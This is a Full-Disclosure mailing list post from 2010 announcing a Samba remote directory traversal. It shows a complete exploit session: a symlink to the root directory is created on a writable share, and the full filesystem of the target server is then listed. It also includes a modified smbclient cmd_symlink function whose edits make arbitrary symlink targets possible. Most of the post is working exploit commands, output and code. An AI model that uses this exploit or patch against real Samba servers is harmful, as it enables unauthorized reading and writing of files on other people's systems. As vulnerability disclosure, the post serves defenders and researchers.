Samba Remote Directory Traversal
logic fuckup discovered & exploited by Kingcope in 2010

It seems there was a quite similar bug found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2

A remote attacker can read, list and retrieve nearly all files on the System 
remotely.
Required is a valid samba account for a share which is writeable OR
a writeable share which is configured to be a guest account share,
in this case this is a preauth exploit.

The attacker can write for example into /tmp or where the account
he is connecting with has access to (/home/<user> etc).

Exploit session (using the patched smbclient exploit):

smb is a samba user created.

r...@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient 
-s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password: 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \> ls
  .                                   D        0  Wed Feb  3 14:27:03 2010
  ..                                  D        0  Wed Feb  3 14:19:13 2010
  test                                D        0  Wed Feb  3 14:19:13 2010
  xxx                                 A     1955  Wed Feb  3 14:22:42 2010

                45503 blocks of size 2097152. 24437 blocks available
smb: \> symlink ../../../../../ foobar
smb: \> ls
  .                                   D        0  Wed Feb  3 14:27:47 2010
  ..                                  D        0  Wed Feb  3 14:19:13 2010
  xxx                                 A     1955  Wed Feb  3 14:22:42 2010
  foobar                              D        0  Mon Feb  1 20:29:12 2010

                45503 blocks of size 2097152. 24437 blocks available
smb: \> ls ..
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \..

                45503 blocks of size 2097152. 24437 blocks available
smb: \> cd foobar
smb: \foobar\> ls
  .                                   D        0  Mon Feb  1 20:29:12 2010
  ..                                  D        0  Mon Feb  1 20:29:12 2010
  initrd.img.old                         7646184  Mon Jan 18 13:15:48 2010
  boot.ini                                 18832  Mon Feb  1 20:29:12 2010
  home                                D        0  Mon Jan 18 13:08:24 2010
  initrd.img                             8007195  Thu Jan 21 21:51:26 2010
  .cache                             DH        0  Sat Jan 23 14:19:08 2010
  opt                                 D        0  Sat Jan 30 11:39:59 2010
  lib                                 D        0  Thu Jan 21 21:13:01 2010
  usr                                 D        0  Sun Jan 31 22:08:11 2010
  .libs                              DH        0  Thu Jan 21 12:30:48 2010
  var                                 D        0  Sun Jan 31 21:14:42 2010
  bin                                 D        0  Mon Jan 18 13:31:14 2010
  selinux                             D        0  Tue Oct 20 01:05:22 2009
  root                                D        0  Tue Feb  2 19:43:59 2010
  vmlinuz.old                            3890400  Fri Oct 16 20:03:49 2009
  vmlinuz                                3890560  Thu Dec 10 20:33:26 2009
  etc                                 D        0  Wed Feb  3 14:17:29 2010
  srv                                 D        0  Sat Jan 23 20:17:29 2010
  proc                               DR        0  Wed Feb  3 14:10:41 2010
  dev                                 D        0  Wed Feb  3 14:11:02 2010
  boot                                D        0  Thu Jan 21 21:51:26 2010
  mnt                                 D        0  Sat Jan 23 19:26:23 2010
  media                               D        0  Fri Jan 29 08:32:31 2010
  cdrom                               D        0  Mon Jan 18 12:40:11 2010
  tmp                                 D        0  Wed Feb  3 14:26:20 2010
  sbin                                D        0  Thu Jan 21 21:50:58 2010
  lost+found                          D        0  Mon Jan 18 12:39:57 2010
  sys                                 D        0  Wed Feb  3 14:10:41 2010

                45503 blocks of size 2097152. 24437 blocks available
smb: \foobar\> 

put and get works in the folder now!

list open shares, this is normal operation mode not an exploit:

r...@nr-pentest:~/Downloads/samba-3.4.5/source3/client# 
/usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/
Enter root's password: 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

        Sharename       Type      Comment
        ---------       ----      -------
        testmount       Disk                                                    
        // < this share is writable and exploitable!!
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (nr-pentest server (Samba, 
Ubuntu))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

        Server               Comment
        ---------            -------
        NR-PENTEST           nr-pentest server (Samba, Ubuntu)

        Workgroup            Master
        ---------            -------
        WORKGROUP            NR-PENTEST


smbclient patch (exploit):

samba-3.4.5/source3/client/client.c
/****************************************************************************
 UNIX symlink.
****************************************************************************/

static int cmd_symlink(void)
{
        TALLOC_CTX *ctx = talloc_tos();
        char *oldname = NULL;
        char *newname = NULL;
        char *buf = NULL;
        char *buf2 = NULL;
        char *targetname = NULL;
        struct cli_state *targetcli;

        if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
            !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
                d_printf("symlink <oldname> <newname>\n");
                return 1;
        }
        oldname = talloc_asprintf(ctx,                  
                        "%s",                           // << HERE modified
                        buf);                           
        if (!oldname) {
                return 1;
        }
        newname = talloc_asprintf(ctx,
                        "%s",                           // << HERE modified
                        buf2);
        if (!newname) {
                return 1;
        }
/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
      oldname = talloc_asprintf(ctx,
                        "%s%s",                         // < modified (see 
above)
                        client_get_cur_dir(),           // < removed (see above)
                        buf);
        if (!oldname) {
                return 1;
        }
        newname = talloc_asprintf(ctx,
                        "%s%s",                         // < modified (see 
above)
                        client_get_cur_dir(),           // < removed (see above)
                        buf2);
        if (!newname) {
                return 1;
        }
----------------------------------------------*/

        if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, 
&targetname)) {
                d_printf("link %s: %s\n", oldname, cli_errstr(cli));
                return 1;

        }

        if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
                d_printf("Server doesn't support UNIX CIFS calls.\n");
                return 1;
        }

        if (!cli_unix_symlink(targetcli, targetname, newname)) {
                d_printf("%s symlinking files (%s -> %s)\n",
                        cli_errstr(targetcli), newname, targetname);
                return 1;
        }

        return 0;
}


// Cheers,
// kcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to